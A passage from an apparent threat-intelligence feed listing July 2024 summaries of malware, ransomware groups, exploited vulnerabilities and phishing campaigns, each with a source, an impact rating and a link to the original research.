Summary:: Accusing U.S government agencies of making up a story to make money and keep surveillance powers, Volt Typhoon investigation by National Computer Virus Emergency Response Center of China points out that mainstream US media outlets have kept quiet about the evidence showing that there has been a use of disinformation to secure increased appropriation and legitimize their far reaching FISA section 702 surveillance. It is referred to in the disclosure that this campaign was schemed to eliminate foreign competition, thus sustaining American monopoly over cyber space.

Source: https://www.cverc.org.cn/head/zhaiyao/futetaifengerEN.pdf

Intel Source:: Cyble

Intel Name:: New_Jellyfish_Loader

Date of Scan:: 2024-07-15

Impact:: LOW

Summary:: CRIL researchers have identified new malware called Jellyfish Loader. This loader uses tools like Fody and Costura to embed dependencies and utilizes asynchronous methods for execution. The Jellyfish Loader extracts basic system information from the infected system and stores it in JSON format. It has the capability to send this system information and uses SSL certificate validation before communicating with the C2 server. The C2 server then sends shellcode to the victim’s machine for further malicious activities.

Source: https://cyble.com/blog/investigating-the-new-jellyfish-loader/

Intel Source:: Zscaler

Intel Name:: MoonWalk_an_Exploring_APT41_Updated_Arsenal

Date of Scan:: 2024-07-12

Impact:: LOW

Summary:: Zcsalar researchers have investigated the MoonWalk backdoor, a recent addition to APT41's toolbox. They noticed that MoonWalk uses many evasion techniques. It uses Google Drive for command-and-control (C2) communication and exploits Windows Fibers, a little-known Windows feature, to avoid anti-virus (AV) and endpoint detection and response (EDR) solutions.

Source: https://www.zscaler.com/blogs/security-research/moonwalk-deep-dive-updated-arsenal-apt41-part-2

Intel Source:: Cyfirma

Intel Name:: Braodo_Info_Stealer_Targeting_Vietnam_and_Abroad

Date of Scan:: 2024-07-12

Impact:: LOW

Summary:: Researchers at Cyfirma have discovered Braodo Stealer, a Python-based malware that has been active since early 2024 and mainly targets users in Vietnam, with other victims in the United States, Czechia, Germany, the Netherlands, Singapore, and the United Kingdom. It could spread by phishing and spear-phishing emails.

Source: https://www.cyfirma.com/research/braodo-info-stealer-targeting-vietnam-and-abroad/

Intel Source:: DocGuard

Intel Name:: Malware_Targeting_Browser_Data_with_Python_Basis

Date of Scan:: 2024-07-12

Impact:: LOW

Summary:: Researchers from DocGuard have discovered a stealer malware spreading through Word documents. Once installed on a compromised computer, it obtains the device's IP address and transfers the user's browser data to a country-specific command-and-control (C2) server.

Source: https://www.docguard.io/analysis-of-malicious-word-document-python-based-malware-targeting-browser-data/

Intel Source:: ThreatMon

Intel Name:: A_Stealer_Tool_Named_Serpantis_Stealer

Date of Scan:: 2024-07-12

Impact:: LOW

Summary:: Researchers at ThreatMon have discovered Serpantis Stealer, an open-source stealing tool written in Python and available on GitHub. This utility poses major threats with its vast variety of capabilities, such as making specific fake error messages to trick users, capturing screenshots of all connected monitors, extracting and retrieving passwords and WiFi profiles, creates a mutex to prevent it from being executed multiple times at the same time, monitors and sends token, password, email, or password change events after login, It extracts saved passwords from web browsers and many more.

Source: https://x.com/monthreat/status/1811432802308559095?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: Forcepoint

Intel Name:: Shadowroot_Ransomware

Date of Scan:: 2024-07-12

Impact:: MEDIUM

Summary:: Forcepoint's X-Labs team has discovered ShadowRoot, a ransomware targeting Turkish businesses through phishing emails with malicious PDF attachments from a malicious domain. When recipients click the embedded link, it downloads an executable that encrypts files with a ".shadowroot" extension. The malware performs various stealthy actions, including downloading additional binaries, executing obfuscated code, and using PowerShell commands. A ransom note is left on the victim's desktop, instructing them to contact the attackers via email for decryption

Source: https://www.forcepoint.com/blog/x-labs/shadowroot-ransomware-targeting-turkish-businesses

Intel Source:: X (Twitter)

Intel Name:: PurpleFox_Malware_Activities

Date of Scan:: 2024-07-12

Impact:: LOW

Summary:: Security researcher vm001cn identified the PurpleFox malware with a valid signature on X (Twitter). Purple Fox downloads and runs its payload using the MsiInstallProductA msi.dll function. The payload consists of a.msi file with 32- and 64-bit encrypted shellcode. After it has been run, the system will restart and rename its components using the 'PendingFileRenameOperations' registry.

Source: https://x.com/vm001cn/status/1809909869883072703?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: ZScaler

Intel Name:: ValleyRAT_Latest_Variant

Date of Scan:: 2024-07-12

Impact:: MEDIUM

Summary:: Zscaler's ThreatLabz has conducted an in-depth analysis of the latest variant of ValleyRAT malware. This sophisticated malware employs a multi-stage attack chain, starting with a downloader that retrieves files from an HFS server and uses complex decryption methods to unpack further stages. The malware features anti-antivirus checks and terminates specific security processes. In its second stage, it leverages a legitimate Microsoft Word executable to sideload a malicious DLL, which then injects shellcode into svchost.exe for further payload delivery. ValleyRAT establishes persistence by modifying autorun keys and sets file attributes to hidden and system. The final payload exhibits advanced capabilities, including enhanced device fingerprinting, dynamic API resolving, and new commands for remote operations such as screenshot capture and forced system actions.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-latest-variant-valleyrat

Intel Source:: Silent Push

Intel Name:: Unmasking_FIN7_Campaigns

Date of Scan:: 2024-07-12

Impact:: LOW

Summary:: Researchers from Silent Push have discovered the largest collection of FIN7 domains, including over 4000 IOFA domains and IP addresses. Prominent global brands like Louvre, Meta, Reuters, and Microsoft have been targeted in these large-scale phishing and malware attacks. FIN7 mainly targeting industries in the US, like retail, hospitality, tech, consulting, and financial services. The research indicates either the resurfacing of FIN7 or the repurposing of their tactics to launch new campaigns.

Source: https://www.silentpush.com/blog/fin7/#h-iofas

Intel Source:: SonicWall

Intel Name:: PDF_files_embedded_with_QRcodes

Date of Scan:: 2024-07-12

Impact:: LOW

Summary:: SonicWall researchers have observed that malware authors are using PDF files with QR codes to lure users because QR codes are very popular and utilized in every sector. These QR codes come from emails asking users to scan them for security updates or document signing. Once users scan the QR code, it redirects to a phishing page that mimics the official Microsoft login page. Once Users enter their Microsoft account username and password then attackers use this information to access their email, personal information, and sensitive company data without permission.

Source: https://blog.sonicwall.com/en-us/2024/07/the-hidden-danger-of-pdf-files-with-embedded-qr-codes/

Intel Source:: Cisco Talos

Intel Name:: Data_Breaches_Exploited_in_Cryptocurrency_Scams

Date of Scan:: 2024-07-12

Impact:: LOW

Summary:: Researchers from Cisco Talos have discovered a new cryptocurrency scam, that exploits data breaches. Attackers are leveraging stolen information to conduct more advanced and damaging attacks, capitalizing on victims' concerns about their compromised data. The impact of these data breaches extends beyond the immediate loss of information, affecting the security, reputation, and financial stability of both individuals and organizations.

Source: https://blog.talosintelligence.com/data-breaches-fueling-scam-campaigns/

Intel Source:: Blackberry

Intel Name:: Akira_Ransomware_Targets_LATAM_Airlines_industry

Date of Scan:: 2024-07-11

Impact:: MEDIUM

Summary:: Researchers at Blackberry have identified a threat actor leveraged Akira ransomware to target Latin American airline, by exploiting vulnerability in Veeam Backup & replication component (CVE2023 -27532). The threat actor also abuses several legitimate tools and achieve their goal of exfiltrating data. Akira ransomware first emerged in March 2023, associated with RaaS group known as Storm-1567 (aka Punk Spider and GOLD SAHARA). The group employs a double-extortion tactic, and encrypts data in windows, Linux, VMware environment. The group have been targeted 250 organisations across the globe.

Source: https://blogs.blackberry.com/en/2024/07/akira-ransomware-targets-the-latam-airline-industry

Intel Source:: Zscaler

Intel Name:: DodgeBox_an_Exploring_APT41_Updated_Arsenal

Date of Scan:: 2024-07-11

Impact:: LOW

Summary:: Zscaler researchers have discovered a new malware loader called DodgeBox. It closely looks like StealthVector, a tool associated with the Chinese APT group APT41 also known as Earth Baku. DodgeBox loads a new backdoor named MoonWalk, which uses Google Drive for command-and-control. APT41 has upgraded StealthVector to DodgeBox, employing advanced evasion tactics such as DLL sideloading and call stack spoofing to evade detection.

Source: https://www.zscaler.com/blogs/security-research/dodgebox-deep-dive-updated-arsenal-apt41-part-1

Intel Source:: GROUP-IB

Intel Name:: Ransomware_Targeting_Veeam_Backup_Vulnerability

Date of Scan:: 2024-07-11

Impact:: LOW

Summary:: Researchers from GROUP-IB have observed that a vulnerability CVE-2023-27532 in Veeam Backup & Replication software that was was disclosed in March 2023. Veeam has since fixed this issue in versions 12/11a and later. Following the exploitation attempts of CVE-2023-27532, threat actors activated xp_cmdshell and created rogue the user accounts. They are using tools such as NetScan, AdFind, and various utilities from NirSoft to perform network discovery, enumeration, and credential harvesting.

Source: https://www.group-ib.com/blog/estate-ransomware/

Intel Source:: Cofense

Intel Name:: New_Poco_RAT_Malware

Date of Scan:: 2024-07-11

Impact:: LOW

Summary:: Cofense researchers have identified a new malware named Poco RAT, is a basic Spanish language targeted Remote Access Trojan. It first appeared in early 2024, focusing mostly on mining-related businesses, and began the journey via Google Drive hosted embedded links to 7zip archives containing executable files. The campaigns are still active and exhibit the same TTPs. The majority of the malware's specialized code appears to be focused on anti-analysis, communication with its command and control center (C2), downloading or running files, and very little on monitoring or collecting credentials.

Source: https://cofense.com/blog/new-malware-campaign-targeting-spanish-language-victims/

Intel Source:: Sysdig

Intel Name:: CRYSTALRAY_Threat_Actor

Date of Scan:: 2024-07-11

Impact:: MEDIUM

Summary:: Sysdig threat researchers have identified a new threat actor called CRYSTALRAY, which first emerged in early 2024. Initially, this threat actor was known for exploiting Confluence vulnerabilities. However, CRYSTALRAY is now expanding its operations and affecting 1,500 victims. Attacker gains access to its targets by using existing vulnerability proof of concepts which they modify for their payload and installing backdoors with multiple open-source security tools. Their goals are to gather and sell credentials, deploy cryptominers, and maintain persistence in their victims' environments. They use tools like zmap, asn, httpx, nuclei, platypus, and SSH-Snake to carry out their attacks.

Source: https://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/

Intel Source:: PaloAlto

Intel Name:: Darkgate_Malware_Campaign

Date of Scan:: 2024-07-11

Impact:: MEDIUM

Summary:: Researchers from Palo Alto Networks have uncovered a new malware campaign named DarkGate, active from March to April 2024, which exploits Microsoft Excel files to download malicious software from publicly accessible SMB file shares. DarkGate initially emerged in 2018 and has evolved into a malware-as-a-service (MaaS) offering. Researchers also observed the multiple distribution method like Teams chat, PDF files, ZIP archives and HTMT file which includes AutoIt to infect victims with DarkGate malware. The primary victims of this campaign in North America, Europe and some parts of Asia.

Source: https://unit42.paloaltonetworks.com/darkgate-malware-uses-excel-files/

Intel Source:: Coinmonks

Intel Name:: A_Strong_Foothold_For_Medusa_Ransomware

Date of Scan:: 2024-07-11

Impact:: LOW

Summary:: According to Coinmonks researchers, Medusa Ransomware came to prominence in June 2023 when a high level of activity was detected, although the group was formed in 2021. The ransom note is titled !!!READ_ME_MEDUSA!!!.txt while it appends the .MEDUSA extension to the names of infected files. At present, Medusa has affected about 255 victims where 138 are traced in United States (US), Canada with 22 and UK at 21 on their Dark Web leak site (ATTOW). These sectors include Manufacturing, Services, Education, Finance and Healthcare as the main targets for this group.

Source: https://medium.com/coinmonks/medusa-ransomware-setting-strong-foothold-b8729844df5b

Intel Source:: Akamai

Intel Name:: Exploitation_of_PHP_Vulnerability_CVE_2024_4577

Date of Scan:: 2024-07-11

Impact:: LOW

Summary:: Researchers from Akamai have observed the activity of CVE-2024-4577, which is a PHP vulnerability. This vulnerability affects Windows installations using Chinese and Japanese locales, but it might impact other installations as well. The exploitations involve command injection and malware campaigns like Gh0st RAT, RedTail cryptominers, and XMRig. Akamai's App & API Protector has been automatically blocking these exploits for their customers.

Source: https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure#com

Intel Source:: Juniper Networks

Intel Name:: An_Overview_of_BianLian_Ransomware_Group

Date of Scan:: 2024-07-11

Impact:: MEDIUM

Summary:: Juniper researchers have observed the activities of the BianLian ransomware group, which emerged in 2022. It is now one of the top three active ransomware groups, after Lockbit and AlphV. BianLian threat actors gain initial access by leveraging compromised Remote Desktop Protocol (RDP) credentials, often gained via phishing. They deploy custom malware written in the Go programming language to evade detection. BianLian's operations focus on a double-extortion approach of encrypting and stealing data. This group mainly targets the legal and healthcare sectors due to their sensitive and critical data. However, BianLian also attacks other industries such as Finance, Accounting, Transportation, Manufacturing, and smaller sectors.

Source: https://blogs.juniper.net/en-us/security/bianlian-ransomware-group-2024-activity-analysis

Intel Source:: Reversinglabs

Intel Name:: Malicious_NuGet_campaign

Date of Scan:: 2024-07-11

Impact:: LOW

Summary:: Researchers at Reversing Labs have uncovered a malicious campaign targeting the NuGet package manager since August 2023. Initially, attackers were using PowerShell scripts but switched their tactics to exploit NuGet’s MSBuild integrations. They also put effort to make their malicious packages appear legitimate by mimicking trusted packages, creating deceptive typosquatting names, and inflating download counts. The attackers use a technique called IL weaving to modify code and release it under names like Gսոa.UI3.Wіnfօrms. This campaign also shows how attackers keep changing their tactic to lure developers and security teams into downloading and using malicious packages from open-source platforms like NuGet.

Source: https://www.reversinglabs.com/blog/malicious-nuget-campaign-uses-homoglyphs-and-il-weaving-to-fool-devs

Intel Source:: Symantec

Intel Name:: Ransomware_Activity_Trends

Date of Scan:: 2024-07-11

Impact:: LOW

Summary:: Symantec researchers have analyzed the ransomware activities and observed in the first quarter of 2024, there was a slight decline in ransomware activity as major groups such as Noberus and LockBit were disrupted. However, the trend remains generally upward compared to the same period in 2023. According to data from ransomware leak sites, there were 962 reported attacks in Q1 2024, this was a reduction compared to Q4 2023 but an increase over Q1 2023. It is worth mentioning that Law enforcement got involved leading to closure by March of this year due to its direct impact on Noberus itself.

Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomware-q2-2024

Intel Source:: CheckPoint

Intel Name:: ZeroDay_Exploitation_of_CVE_2024_38112

Date of Scan:: 2024-07-10

Impact:: LOW

Summary:: Researchers at Checkpoint have discovered that threat actors use a zero-day vulnerability (CVE-2024-38112) leveraging internet shortcut files (.url extension) to implement remote code execution on Windows systems. By making use of these files, the attackers are able to launch Internet Explorer which is however long gone with the wind and is more vulnerable compared to secure browsers like Chrome and Edge so that they could mask a malicious .hta extension in order to gain an upper hand when compromising machines running on Windows 10/11.

Source: https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/

Intel Source:: QuoIntelligence

Intel Name:: Ticket_Heist_Campaign

Date of Scan:: 2024-07-10

Impact:: MEDIUM

Summary:: Researchers at QuoIntelligence have identified a fraudulent campaign linked to the Paris Olympics called Ticket Heist. This campaign primarily targets Russian and English-speaking individuals worldwide and in Eastern European countries. The fraudsters lure victims into buying tickets for the Paris 2024 Olympic Games and UEFA EURO 2024 events from untrusted and unofficial platforms. This fraudulent activity extends beyond sporting events to include activities like music festivals including famous musicians. The impact of such campaigns results in financial losses, reputational damage, and loss of trust for both individuals and event organizers.

Source: https://quointelligence.eu/2024/07/ticket-heist-olympic-games-and-sporting-events-at-risk/

Intel Source:: IC3 GOV

Intel Name:: Russian_State_Sponsored_Media_Used_Meliorator_Tool

Date of Scan:: 2024-07-10

Impact:: MEDIUM

Summary:: An advisory has been released by the U.S. Federal Bureau of Investigation (FBI) and Cyber National Mission Force (CNMF), in collaboration with the Netherlands General Intelligence and Security Service (AIVD), Netherlands Military Intelligence and Security Service (MIVD), the Netherlands Police (DNP), and the Canadian Centre for Cyber Security (CCCS), collectively known as the authoring organizations, to alert social media companies to the use of covert Meliorator software by Russian state-sponsored actors for foreign malign influence activity that benefits the Russian government.

Source: https://www.ic3.gov/Media/News/2024/240709.pdf

Intel Source:: Cisco Talos

Intel Name:: Evasion_Tactics_in_HTML_Smuggling

Date of Scan:: 2024-07-10

Impact:: LOW

Summary:: Researchers from Cisco Talos have discovered numerous malicious email campaigns using a technique called HTML Smuggling where JavaScript code is hidden in HTML email attachments. This technique is commonly used in spear phishing attacks, often targeting human resources, insurance, and healthcare sectors, while e-commerce and legal sectors are less affected. Attackers use various evasion techniques to bypass email gateways and advanced detection methods. These tricks include different encoding techniques, encryption and obfuscation.

Source: https://blog.talosintelligence.com/hidden-between-the-tags-insights-into-evasion-techniques-in-html-smuggling/

Intel Source:: Trellix

Intel Name:: ViperSoftX_Malware_Using_Torrented_eBooks

Date of Scan:: 2024-07-10

Impact:: LOW

Summary:: Researchers at Trellix have observed that ViperSoftX has evolved into a new type of malware proficient at penetrating systems and extracting sensitive information. Initially spread through cracked software, tricking users into downloading pirated apps that secretly installed the malware. While, it was mainly spread through torrent sites, but now they have noticed that it is now being specifically distributed as eBooks over torrents.

Source: https://www.trellix.com/blogs/research/the-mechanics-of-vipersofts-exploiting-autoit-and-clr-for-stealthy-powershell-execution/

Intel Source:: Blackberry

Intel Name:: Coyote_Banking_Trojan_Targeting_LATAM

Date of Scan:: 2024-07-10

Impact:: MEDIUM

Summary:: Researchers at BlackBerry have identified Coyote as a .NET banking Trojan targeting Brazilian financial institutions such as banks. It is unique from other banking Trojans because of its unconventional execution chain. Researchers first found it in February 2024, and it was named Coyote because of its use of squirrel, which is a legitimate software used to install and/or update Windows applications.

Source: https://blogs.blackberry.com/en/2024/07/coyote-banking-trojan-targets-latam-with-a-focus-on-brazilian-financial-institutions

Intel Source:: CISA

Intel Name:: Warning_of_China_Linked_APT40_Group

Date of Scan:: 2024-07-09

Impact:: MEDIUM

Summary:: A joint advisory about a China-linked cyber espionage group called APT40 has been released by cybersecurity agencies ASD's ACSC, CISA, NSA, FBI, NCSC-UK, CCCS, NCSC-NZ, BND and BfV, NIIS, NIS, NISC, and NPA. The advisory warns about APT40's ability to co-opt exploits for recently disclosed security flaws within hours or days of public release. APT 40 has previously targeted groups in many countries, including Australia and the United States. Most notably, APT 40 can quickly modify and adapt vulnerability proofs-of-concept (PoCs) for use in activities related to targeting, reconnaissance, and exploitation operations.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-190a

Intel Source:: Check Point

Intel Name:: Exploitation_of_V8_JavaScript_Malware

Date of Scan:: 2024-07-09

Impact:: LOW

Summary:: Researchers at Checkpoint have explored how malware developers use compiled V8 JavaScript. Compiled V8 JavaScript is a less well-known feature of V8, Google's JavaScript engine that allows JavaScript to be compiled into low-level bytecode. This method makes it nearly hard to analyze statically by helping attackers avoid static detections and conceal their original source code.

Source: https://research.checkpoint.com/2024/exploring-compiled-v8-javascript-usage-in-malware/

Intel Source:: Phylum

Intel Name:: NPM_Campaign_Ships_Trojanized_jQuery

Date of Scan:: 2024-07-09

Impact:: LOW

Summary:: Researchers from Phylum have monitored a persistent supply chain attacker using a trojanized version of jQuery. The compromised version was first found by them on npm, where they observed it being published in numerous packages over a month. Upon further investigation, they discovered that the trojanized version of jQuery was present on numerous websites, including GitHub, and even on jsDelivr as a CDN-hosted resource.

Source: https://blog.phylum.io/persistent-npm-campaign-shipping-trojanized-jquery/

Intel Source:: ThreatMon

Intel Name:: New_Version_of_XFiles_Stealer

Date of Scan:: 2024-07-09

Impact:: LOW

Summary:: Researchers from ThreatMon have noticed that the C-programmed written XFiles Stealer has been updated and announced on a dark web forum. Xfiles is running on Windows 7 to Windows 11 systems. It gathers information about browser usage, cookies, credit card information, passwords, autofills, and supports more than 80 browser-based cryptocurrency wallets. A plethora of messengers, a file encryption system, training guides tailored to Xfiles, and much more are included in Stealer.

Source: https://x.com/monthreat/status/1810610913520599462?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: Cisco Talos

Intel Name:: Cryptocurrency_drainer_phishing_scams

Date of Scan:: 2024-07-09

Impact:: LOW

Summary:: Researchers at Cisco Talos have uncovered a phishing campaign linked to cryptocurrency scams. These scams are becoming a major threat to the cryptocurrency world. In this campaign scammers target cryptocurrency holders and use social engineering tactic to entice people to reveal their login credentials. These scams attract investors with the promise of high returns on investment and exciting new technology. However, instead of fulfilling their promises, the scammers abscond with the investors' funds.

Source: https://blog.talosintelligence.com/how-do-cryptocurrency-drainer-phishing-scams-work/

Intel Source:: Cyfirma

Intel Name:: An_Examination_of_Kematian_Stealer

Date of Scan:: 2024-07-08

Impact:: LOW

Summary:: Researchers at CYFIRMA have uncovered Kematian-Stealer, a sophisticated info stealer targeting Windows systems, hosted on GitHub. This open-source malware is designed to stealthily extract data from a wide range of sources including browsers, cryptocurrency wallets, messaging apps, gaming platforms, VPNs, and email clients. It employs advanced techniques such as covert data extraction, persistence mechanisms, detection evasion, in-memory execution, and data exfiltration via Discord webhooks. It can also download and execute additional scripts and payloads directly into memory.

Source: https://www.cyfirma.com/research/kematian-stealer-a-deep-dive-into-a-new-information-stealer/

Intel Source:: Avast

Intel Name:: DoNex_Ransomware

Date of Scan:: 2024-07-08

Impact:: MEDIUM

Summary:: Researchers from Avast have discovered an activity of the DoNex ransomware and its predecessors. In cooperation with law enforcement organizations, we have been silently providing the decryptor to DoNex ransomware victims since March 2024. The DoNex ransomware has been rebranded several times. The first brand, called Muse, appeared in April 2022. The rebrand to Rebrand to fake LockBit 3.0, the next rebrand was in May 2023 to DarkRace and another one was in March 2024 to DoNex one.

Source: https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/

Intel Source:: ISC.SANS

Intel Name:: Linux_hosts_activity

Date of Scan:: 2024-07-08

Impact:: LOW

Summary:: Recently SC.SANS researcher Xavier MertensI attended a conference focussing on open-source software and cybersecurity. He was introduced to the tool « Kunai ». This tool, developed by Quentin Jérôme from the Luxembourg CERT aims to replace SysmonForLinux. Its purpose is to record and log system activity but in a more «Linux-oriented» flavor. Kunai is developed in Rust and uses eBPF to interact with the kernel (compatible with all the Linux LTS kernels(from 5.4 to 6.6).

Source: https://isc.sans.edu/diary/rss/31054

Intel Source:: Linkedin

Intel Name:: Cloud_Snooper_Attack

Date of Scan:: 2024-07-08

Impact:: MEDIUM

Summary:: A unique combination of techniques is used in the Cloud Snooper composite attack to facilitate malware's easy interaction with command and control servers on compromised hosts. In order to send commands to and receive data from the backdoor, the adversary uses a rootkit that monitors network traffic in conjunction with a backdoor.

Source: https://www.linkedin.com/posts/hackforlab_threathunting-threatintelligence-cybersecurity-activity-7215365934096470016-rdCK?utm_source=share&utm_medium=member_ios

Intel Source:: Securelist

Intel Name:: CloudSorcerer_Targeting_Russian_Entities

Date of Scan:: 2024-07-08

Impact:: LOW

Summary:: Researchers from Securelist have discovered a new APT called CloudSorcerer, which targets Russian government entities. This advanced monitoring tool is used for secret monitoring, data collection, and stealing data through Microsoft Graph, Yandex Cloud, and Dropbox. It uses these cloud services as its C2 servers, accessing them with authentication tokens. CloudSorcerer also using GitHub as its initial C2 server.

Source: https://securelist.com/cloudsorcerer-new-apt-cloud-actor/113056/

Intel Source:: X (Twitter)

Intel Name:: New_Indicators_of_AsyncRAT

Date of Scan:: 2024-07-05

Impact:: LOW

Summary:: The Fox_threatintel researchers have identified the new indicator of compromise for AsyncRAT on X (Twitter). AsyncRAT is a remote access trojan (RAT) released in 2019, primarily as a credential stealer and loader for other malware, including ransomware. Also, it has botnet capabilities and a command and control (C2) interface allowing operators to control infected hosts remotely.

Source: https://x.com/banthisguy9349/status/1808888209306251349?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: ThreatMon

Intel Name:: Neptune_Stealer

Date of Scan:: 2024-07-05

Impact:: LOW

Summary:: The ThreatMon researchers have detected an open-source stealer tool named Neptune Stealer developed in Python, which has been shared on GitHub. Some features are cookie information from websites, information about the system, browser history, webcam screenshots, wifi password, autofill information, keylogger, crypto wallet stealer, It starts every time the target's machine starts, It is claimed to have many features, such as the ability to steal.

Source: https://x.com/monthreat/status/1808839272142668037?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: CERT-AGID

Intel Name:: FedEx_Themed_Phishing_Attacks_Hit_Italy

Date of Scan:: 2024-07-05

Impact:: LOW

Summary:: Researchers from CERT-AgID have observed new phishing campaigns targeting FedEx users in Italy. These scams using fake shipping communications to deceive recipients and steal their personal and financial data. Users are advised to be cautious and verify the authenticity of any emails claiming to be from FedEx.

Source: https://cert-agid.gov.it/news/in-corso-campagne-di-phishing-italiane-a-tema-fedex/

Intel Source:: Group-IB

Intel Name:: Eldorado_Ransomware

Date of Scan:: 2024-07-05

Impact:: MEDIUM

Summary:: Researchers at Group-IB have observed the activity of a new RaaS group called Eldorado, which appeared in March 2024 and offers locker and loader variants for Linux and Windows. The operators of this group are promoting their malicious service on RAMP forums and are seeking skilled affiliates to join their program. This group has attacked 16 companies globally, most of them in the US. The most targeted industries by this group are real estate, healthcare, manufacturing, and government sectors. Eldorado uses Golang ransomware that can encrypt both Windows and Linux systems with two similar types of malwares.

Source: https://www.group-ib.com/blog/eldorado-ransomware/

Intel Source:: Esentire

Intel Name:: ScreenConnect_Link_to_AsyncRAT_Deployment

Date of Scan:: 2024-07-05

Impact:: LOW

Summary:: ESentire researchers have uncovered a sophisticated campaign where threat actors exploit the ScreenConnect remote access client to deliver the AsyncRAT trojan from fraudulent websites. The attack occurs when user visit a compromised website and is redirected to download the ScreenConnect application automatically. Once ScreenConnect is downloaded, it connects to instances of the threat actor. This established a remote session that allowed the attacker to drop an executable file that led to AsyncRAT. The AsyncRAT give the attackers major control over the compromised systems to enable data theft, system manipulation, and further malware deployment.

Source: https://www.esentire.com/blog/exploring-the-infection-chain-screenconnects-link-to-asyncrat-deployment

Intel Source:: Trend Micro

Intel Name:: Exploiting_Jenkins_for_Cryptomining

Date of Scan:: 2024-07-05

Impact:: LOW

Summary:: Researchers from Trend Micro Observed that attackers can misuse the Jenkins Script Console to run harmful scripts for things like cryptocurrency mining. To protect against this, organizations should ensure proper configuration, strong authentication and authorization, regular audits, and limit internet access to Jenkins servers. These steps can help prevent Jenkins from being used as an attack point and protect development environments from exploitation.

Source: https://www.trendmicro.com/en_us/research/24/g/turning-jenkins-into-a-cryptomining-machine-from-an-attackers-pe.html

Intel Source:: Cyble

Intel Name:: Exploitating_Microsoft_SmartScreen_vulnerability

Date of Scan:: 2024-07-05

Impact:: MEDIUM

Summary:: CRIL researchers have uncovered an active campaign exploiting a Microsoft SmartScreen vulnerability to deploy malware like Lumma and Meduza Stealer, which steal sensitive information. This campaign targets regions such as Spain, US, and Australia. The attack begins with a spam email that looks like it comes from a legitimate source. The email entices the user into clicking a link to view an internet shortcut file on a remote WebDAV share and when the user clicks this file, it exploits vulnerability and runs another LNK file from the same WebDAV. The attack uses different script files like PowerShell and JavaScript to deliver the final payload.

Source: https://cyble.com/blog/increase-in-the-exploitation-of-microsoft-smartscreen-vulnerability-cve-2024-21412/

Intel Source:: GDATA

Intel Name:: Turla_Exploits_Shortcut_File_and_Fileless_Backdoor

Date of Scan:: 2024-07-05

Impact:: MEDIUM

Summary:: Researchers at GDATA have discovered a well-planned cyber attack campaign that made use of malicious shortcut files for deployment of fileless backdoor to systems. Attackers employed advanced tactics such as memory patching, AMSI bypass, and event logging disablement to evade detection and improve their capabilities. Among these new attacks is the well-known Turla (Uroburos).

Source: https://www.gdatasoftware.com/blog/2024/07/37977-turla-evasion-lnk-files

Intel Source:: TrendMicro

Intel Name:: Mekotio_Banking_Trojan_Targeting_Financial_Systems

Date of Scan:: 2024-07-04

Impact:: LOW

Summary:: Researchers at TrendMicro have investigated the Mekotio banking trojan, a sophisticated malware targeting the Latin American countries since 2015 with the goal of stealing sensitive information, particularly banking credentials from its target. The methods involve phishing emails employing social engineering to trick users into clicking malicious links or attachments. Furthermore, recently seen a surge in attacks involving Mekotio globally.

Source: https://www.trendmicro.com/en_us/research/24/g/mekotio-banking-trojan.html

Intel Source:: SOC Radar

Intel Name:: Brain_Cipher_Targeting_Indonesian_Data_Center

Date of Scan:: 2024-07-04

Impact:: MEDIUM

Summary:: SOC Radar researchers have identified the Brain Cipher ransomware group, which attracted global notice following a high-profile attack on Indonesia's National Data Center (Pusat Data Nasional - PDN), which affected critical public functions such as immigration. On June 20, a cyberattack targeted one of Indonesia's national data centers. The attack compromised government servers, causing disruptions in immigration, passport control, event permit issuance, and other internet services.

Source: https://socradar.io/dark-web-profile-brain-cipher/

Intel Source:: PaloAlto

Intel Name:: Analyzing_GootLoader_Using_Node_js

Date of Scan:: 2024-07-04

Impact:: LOW

Summary:: PaloAlto researchers have demonstrated how to use Visual Studio Code's Node.js debugging to get around GootLoader malware's anti-analysis tactics. This evasion strategy utilized by GootLoader JavaScript files can pose a significant problem to sandboxes attempting to evaluate the malware.

Source: https://unit42.paloaltonetworks.com/javascript-malware-gootloader/

Intel Source:: ASEC

Intel Name:: Attacks_on_HTTP_File_Servers_CVE_2024_23692

Date of Scan:: 2024-07-04

Impact:: MEDIUM

Summary:: ASEC researchers have examined how the CVE-2024-23692 vulnerability in HTTP File Server (HFS) is being exploited, revealing how attackers use it to run harmful commands remotely. The research also highlights CoinMiners deployment and backdoor like PlugX and GoThief including countermeasures for at-risk systems.

Source: https://asec.ahnlab.com/en/67650/

Intel Source:: Malware Hunter

Intel Name:: LockBit_Black_Decryptor

Date of Scan:: 2024-07-04

Impact:: HIGH

Summary:: The Malware Hunter team have shared a LockBit Black Decryptor file on X (Twitter) and that is possibly the Brain Cipher ransomware group provided to one of their victims.

Source: https://x.com/malwrhunterteam/status/1808814100731826673?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: X (Twitter)

Intel Name:: Mirai_Botnet

Date of Scan:: 2024-07-04

Impact:: LOW

Summary:: The new URLs reported by Abuse.CH are associated with the Mirai Botnet and have been observed by security researcher WatchingRac on X (Twitter). Mirai Botnet infects smart devices that run on ARC processors, turning them into a network of remotely controlled bots or zombies. This network of bots, called a botnet, is often used to launch DDoS attacks.

Source: https://x.com/racwatchin8872/status/1808797006153822577?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: Uptycs

Intel Name:: Mallox_Ransomware_Targeting_Linux

Date of Scan:: 2024-07-04

Impact:: LOW

Summary:: Researchers from Uptycs have discovered a new variant of the Mallox ransomware, also known as Fargo, that targets Linux systems. The Mallox group is known for multi-extortion tactics, encrypting victims' data and threatening to release it on their TOR-based sites. Initially, Mallox payloads were .NET-based, .EXE, or .DLL files, spreading through exposed MS-SQL servers and phishing emails to target Windows systems.

Source: https://www.uptycs.com/blog/mallox-ransomware-linux-variant-decryptor-discovered

Intel Source:: X (Twitter)

